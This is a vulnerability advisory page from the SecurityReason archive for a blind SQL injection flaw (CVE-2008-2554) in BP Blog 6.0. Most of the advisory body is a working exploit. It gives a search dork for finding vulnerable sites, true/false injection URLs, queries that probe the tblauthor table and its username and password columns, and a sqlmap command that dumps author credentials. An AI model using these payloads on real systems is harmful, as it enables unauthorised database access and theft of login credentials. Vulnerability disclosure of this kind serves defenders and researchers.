Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability
  SecurityAlert : 3925
  CVE : CVE-2008-2554
  CWE : CWE-89
  SecurityRisk : High  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Victim interaction required : No
  Exploit Given : Yes
  Credit : JosS, Jose Luis Góngora Fernández
  Published : 07.06.2008

  Affected Software : BP Blog, BP Blog, 6.0



  Advisory Text :  

BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

JosS, Jose Luis Góngora Fernández

Spanish Hackers Team

www.spanish-hackers.com

[+] Info:

[~] Software: bp blog

[~] HomePage: http://blog.betaparticle.com/

[~] Exploit: Blind SQL Injection [High]

[~] Vuln file: template_permalink.asp

[~] Vuln file2: template_archives_cat.asp

[~] template_permalink.asp?id=[blind]

[~] template_archives_cat.asp?cat=[blind]

[~] Bug found by JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[~] EspSeC & Hack0wn!.

[~] Dork: "Powered by bp blog 6.0"

[+] Compression:

[~] True: http://localhost/[path]/template_permalink.asp?id=78 and 1=1

[~] False: http://localhost/[path]/template_permalink.asp?id=78 and 1=2

[+] Exploding:

[*] Checking table:

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count(*) FROM [TABLE]) >= 0

[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and
exists (select * from [TABLE])

[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count(*) FROM tblauthor) >= 0

[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and
exists (select * from tblauthor)

[~] If you don't see any error, it is that table exist.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count(*) FROM [TABLE]) = [NUMBER]

[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count(*) FROM tblauthor) = 1

[~] If you don't see any error, the table has 1 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count([COLUMN]) FROM [TABLE]) >= 0

[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count(fldauthorpassword) FROM tblauthor) >= 0

[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND
(SELECT Count(fldauthorusername) FROM tblauthor) >= 0

[~] If you don't see any error, the column exists.

[*] User and password:

[~] Exploit: ./sqlmap.py -u "URL" -p rid -a "./txt/user-agents.txt" -v1
--string "text" -e "sql query"

[~] Example: ./sqlmap.py -u "http://../template_permalink.asp?id=78" -p id
-a "./txt/user-agents.txt" -v1 --string "bp blog" -e "<SELECT
concat(fldauthorusername,0x3a,fldauthorpassword) from tblauthor where
1=1>"

_EOF_



  References :

http://www.securityfocus.com/bid/29460
http://www.securityfocus.com/archive/1/archive/1/492902/100/0/threaded
http://www.milw0rm.com/exploits/5705



  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.